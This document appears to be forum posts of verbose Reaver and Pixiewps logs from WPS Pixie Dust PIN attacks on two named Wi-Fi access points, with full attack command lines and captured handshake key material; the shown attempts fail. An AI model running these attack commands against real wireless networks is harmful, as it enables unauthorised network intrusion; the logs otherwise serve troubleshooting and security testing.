WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with F4:3E:61:89:44:EB (ESSID: Digicom)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=539 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 f4 3e 61 89 44 eb
WPS: Enrollee MAC Address f4:3e:61:89:44:eb
WPS: Enrollee Nonce - hexdump(len=16): 00 00 67 ea 00 00 7a 02 00 00 00 48 00 00 7d 4c
WPS: Enrollee Authentication Type flags 0x27
WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=64):
52 65 61 6c 74 65 6b 20 53 65 6d 69 63 6f 6e 64 Realtek Semicond
75 63 74 6f 72 20 43 6f 72 70 2e 00 00 00 00 00 uctor Corp._____
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Model Name - hexdump_ascii(len=32):
52 54 4c 38 36 37 31 00 00 00 00 00 00 00 00 00 RTL8671_________
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Model Number - hexdump_ascii(len=32):
45 56 2d 32 30 30 36 2d 30 37 2d 32 37 00 00 00 EV-2006-07-27___
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Serial Number - hexdump_ascii(len=32):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 00 123456789012347_
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ________________
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=32):
41 44 53 4c 20 52 6f 75 74 65 72 2f 4d 6f 64 65 ADSL Router/Mode
6d 20 49 47 44 00 00 00 00 00 00 00 00 00 00 00 m IGD___________
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 32 6c 4d 79 ae 28 86 75 53 bf 55 88 33 b8 26 13
WPS: UUID-R - hexdump(len=16): 90 06 79 56 8f 82 ec 68 25 d3 51 fa e1 de 35 c9
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
DH: public value - hexdump(len=192): 83 6e d9 54 ab 54 0d 86 b9 bb 19 e8 1c 93 9f 4b 45 4d 1c 73 f9 ee 1b 60 d0 19 66 c2 7f f8 8d 8e e0 d9 a8 b2 70 9a 63 3b e6 0f 19 4a f7 b4 ed ff 68 19 bf 21 f2 79 28 1f e1 b6 7b be ce 96 ae 5d 48 50 40 0b 6a 62 d7 c3 80 93 ea 1d 87 29 93 30 eb 1e a8 22 88 6b 07 8c d4 26 d7 5d 9e 4b bb 45 46 9b 64 82 1a 2b 48 56 83 70 2e 3c fd ff c0 b8 51 af f7 70 85 72 a4 12 80 2e d9 86 57 ae f6 ba d8 27 82 9a 30 41 af 74 2e b5 16 aa 81 9f a2 3d 3a 16 41 40 a6 4c 75 ee 3c 07 8e 91 dd 95 5e db 70 8d 32 cc 15 97 43 9b 79 04 33 9f 32 fb 58 7e 50 d5 03 69 75 30 11 a1 9f d1 94 d5 bf dd a9 36
WPS: DH Private Key - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
WPS: DH own Public Key - hexdump(len=192): 83 6e d9 54 ab 54 0d 86 b9 bb 19 e8 1c 93 9f 4b 45 4d 1c 73 f9 ee 1b 60 d0 19 66 c2 7f f8 8d 8e e0 d9 a8 b2 70 9a 63 3b e6 0f 19 4a f7 b4 ed ff 68 19 bf 21 f2 79 28 1f e1 b6 7b be ce 96 ae 5d 48 50 40 0b 6a 62 d7 c3 80 93 ea 1d 87 29 93 30 eb 1e a8 22 88 6b 07 8c d4 26 d7 5d 9e 4b bb 45 46 9b 64 82 1a 2b 48 56 83 70 2e 3c fd ff c0 b8 51 af f7 70 85 72 a4 12 80 2e d9 86 57 ae f6 ba d8 27 82 9a 30 41 af 74 2e b5 16 aa 81 9f a2 3d 3a 16 41 40 a6 4c 75 ee 3c 07 8e 91 dd 95 5e db 70 8d 32 cc 15 97 43 9b 79 04 33 9f 32 fb 58 7e 50 d5 03 69 75 30 11 a1 9f d1 94 d5 bf dd a9 36
WPS: DH Private Key - hexdump(len=192): dd 67 2f 65 74 c8 2c 59 7f 05 4d 21 0b 0f 0f 85 a9 7d 62 47 e3 bf 8a 17 08 1b d4 fc 99 72 e4 f8 51 30 33 fe 80 3f 4f f7 de 2d 77 e6 a9 e5 69 f3 b0 8e d1 f7 ea ef 32 07 2e 30 2b 89 c1 e4 e7 bc 30 30 ff 55 ea 6c d3 37 07 70 0f e7 7b 0a 06 81 4c 70 e4 8c 76 27 fd 8a f3 20 4a 23 89 60 39 98 f3 44 53 d3 dd 3c e9 8f d8 07 fc bb db 69 68 57 43 e1 1b 10 0e ad 6a 83 5b 3b 4e 78 39 7d 5b 7c 0f 7b bc ae 51 4b e3 b6 07 da c8 30 48 78 9b c5 28 77 e1 47 65 0f d7 e2 5c 5d e6 64 f2 5b ae d0 9d 4a fb 2e e1 c8 56 36 a9 d1 0d ec 46 bc f4 dc 2a 88 c0 6a dd 97 19 d0 36 b2 ab eb 24 15 03 00
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): f5 e3 e2 89 f2 78 fb 35 f6 c7 88 f4 73 97 8c c2 0f d7 af 90 08 90 78 fe 24 69 f2 c8 29 f1 13 a8 c4 f1 c3 a2 46 f1 40 bb c0 95 ac f1 80 95 06 5d 0f 98 75 5f 2e 81 4f 7a 07 43 6e 80 e2 d1 ff 9e 3d ce 96 dd bd 26 c3 e7 de 66 06 9d 78 22 56 11 d9 d6 e1 81 aa 45 fb 84 57 ea cb 84 c0 83 e4 60 48 51 0d 3e 63 fd ac 19 92 60 89 b5 25 71 e6 7c 75 c6 10 95 c2 75 37 75 15 69 cc 2f 80 8b 39 28 a0 e2 c8 4d 59 63 6b cc c6 91 84 85 03 30 6c 69 c6 be 5b 1c d1 ad bc 88 74 22 f6 f0 cd 7f af ee 39 9d ba 6a ce a1 c9 e2 7b 44 db bb 62 97 49 bb f0 e0 9c 4e 29 21 79 95 3a 2e bd 3f 56 61 22 ce
WPS: DH shared key - hexdump(len=192): f5 e3 e2 89 f2 78 fb 35 f6 c7 88 f4 73 97 8c c2 0f d7 af 90 08 90 78 fe 24 69 f2 c8 29 f1 13 a8 c4 f1 c3 a2 46 f1 40 bb c0 95 ac f1 80 95 06 5d 0f 98 75 5f 2e 81 4f 7a 07 43 6e 80 e2 d1 ff 9e 3d ce 96 dd bd 26 c3 e7 de 66 06 9d 78 22 56 11 d9 d6 e1 81 aa 45 fb 84 57 ea cb 84 c0 83 e4 60 48 51 0d 3e 63 fd ac 19 92 60 89 b5 25 71 e6 7c 75 c6 10 95 c2 75 37 75 15 69 cc 2f 80 8b 39 28 a0 e2 c8 4d 59 63 6b cc c6 91 84 85 03 30 6c 69 c6 be 5b 1c d1 ad bc 88 74 22 f6 f0 cd 7f af ee 39 9d ba 6a ce a1 c9 e2 7b 44 db bb 62 97 49 bb f0 e0 9c 4e 29 21 79 95 3a 2e bd 3f 56 61 22 ce
WPS: DHKey - hexdump(len=32): 88 de a6 36 aa 7d d4 04 73 d6 19 53 01 e2 e9 2c 01 bb 13 d1 ce f8 20 59 a9 4b c9 07 98 48 6a 3c
WPS: KDK - hexdump(len=32): c7 b2 99 57 a2 87 a5 90 42 c4 bc 57 15 76 1e a8 38 5f b9 ce bd 27 24 3e 20 f2 3e e3 7f 27 74 7e
WPS: AuthKey - hexdump(len=32): 72 46 94 e8 db 8d 34 45 9b da e1 f9 5c d0 b5 b2 c9 4e 6f b6 13 36 84 7a d0 cb 30 2e 90 01 a7 4e
WPS: KeyWrapKey - hexdump(len=16): 5b d8 db e2 d7 b7 12 76 a2 54 a0 69 28 e7 21 d9
WPS: EMSK - hexdump(len=32): 20 4a 35 30 fd 2b e0 be 34 3f 05 02 dc e5 2b b1 53 b7 61 a5 4a 21 6e 33 9f ad e6 8a 57 4f d6 01
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=114 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 04 5f dc 02 7a c3 6e e2 14 cc 75 83 80 47 42 37 4b 1c 3e 71 3d 0b 02 a0 45 7a c9 f2 df 9f ab 7f
WPS: E-Hash2 - hexdump(len=32): 36 73 2b a6 69 7e 0f f8 8b 31 94 e7 28 c5 30 22 46 44 f6 58 d2 24 7e 14 12 af 7c b4 91 06 69 f3
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 045fdc027ac36ee214cc7583804742374b1c3e713d0b02a045 7ac9f2df9fab7f -z 36732ba6697e0ff88b3194e728c530224644f658d2247e1412 af7cb4910669f3 -a 724694e8db8d34459bdae1f95cd0b5b2c94e6fb61336847ad0 cb302e9001a74e -n 000067ea00007a020000004800007d4c -r 836ed954ab540d86b9bb19e81c939f4b454d1c73f9ee1b60d0 1966c27ff88d8ee0d9a8b2709a633be60f194af7b4edff6819 bf21f279281fe1b67bbece96ae5d4850400b6a62d7c38093ea 1d87299330eb1ea822886b078cd426d75d9e4bbb45469b6482 1a2b485683702e3cfdffc0b851aff7708572a412802ed98657 aef6bad827829a3041af742eb516aa819fa23d3a164140a64c 75ee3c078e91dd955edb708d32cc1597439b7904339f32fb58 7e50d50369753011a19fd194d5bfdda936

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 90 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

[@] Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps. Follow the instructions on http://0x0.st/tm - Thank you!

sum1n

2018-04-18, 05:56

reaver -i wlan0mon -b A8:32:9A:00:77:FE -c 1 -vvv -K 1

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from A8:32:9A:00:77:FE
[+] Received beacon from A8:32:9A:00:77:FE
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: Enrollee MAC Address a8:32:9a:00:77:fe
WPS: Enrollee Nonce - hexdump(len=16): 01 2a bb 94 1c 80 f2 25 55 99 69 c1 4a ee 29 ce
WPS: Enrollee Authentication Type flags 0x27
WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 36 37 31 RTL8671
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 12 d5 d7 40 9b f0 e2 2f f6 c5 ed 49 89 f7 aa 76
WPS: UUID-R - hexdump(len=16): a5 2f e6 d2 6c 6c f9 1e d0 4c a3 77 37 0f 55 91
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
DH: public value - hexdump(len=192): 9d c1 7d cc 93 da 16 0b ca 2c 87 1a fa be 14 ba 4f 66 8d b1 be 1e 10 8b 14 43 dc a1 82 2e 62 fb 51 41 1a a6 e2 aa 29 76 4f 44 81 8b b5 aa 2e cf 43 f6 6a da 3b 66 9e 58 9c 82 57 38 dd 3f 48 f8 b8 ee 84 78 48 04 ec a9 60 0b c8 7d 16 2e d5 1b 4d cc 3b 8f a1 e0 2f c6 e4 ab c1 89 80 7a 4c 5a 22 cd c7 7b bc 20 a5 46 b2 86 d8 50 12 fc ae 8e cc 02 15 94 55 a0 fd 5f 94 6e 8b 97 18 20 4c b7 f1 4a 34 6c 7e a5 ce a7 c2 a0 b6 b0 ab b6 4c 56 ce 7c 5d cc 8f 0c 64 07 0e 1c 99 8d 5e dd 88 62 b8 38 b7 0d 1d 36 fb 0f 07 f1 ec 5f 34 df c4 c8 96 e4 67 c9 a0 5e 12 a8 f7 6c 15 1c b0 82 3a 08
WPS: DH Private Key - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
WPS: DH own Public Key - hexdump(len=192): 9d c1 7d cc 93 da 16 0b ca 2c 87 1a fa be 14 ba 4f 66 8d b1 be 1e 10 8b 14 43 dc a1 82 2e 62 fb 51 41 1a a6 e2 aa 29 76 4f 44 81 8b b5 aa 2e cf 43 f6 6a da 3b 66 9e 58 9c 82 57 38 dd 3f 48 f8 b8 ee 84 78 48 04 ec a9 60 0b c8 7d 16 2e d5 1b 4d cc 3b 8f a1 e0 2f c6 e4 ab c1 89 80 7a 4c 5a 22 cd c7 7b bc 20 a5 46 b2 86 d8 50 12 fc ae 8e cc 02 15 94 55 a0 fd 5f 94 6e 8b 97 18 20 4c b7 f1 4a 34 6c 7e a5 ce a7 c2 a0 b6 b0 ab b6 4c 56 ce 7c 5d cc 8f 0c 64 07 0e 1c 99 8d 5e dd 88 62 b8 38 b7 0d 1d 36 fb 0f 07 f1 ec 5f 34 df c4 c8 96 e4 67 c9 a0 5e 12 a8 f7 6c 15 1c b0 82 3a 08
WPS: DH Private Key - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
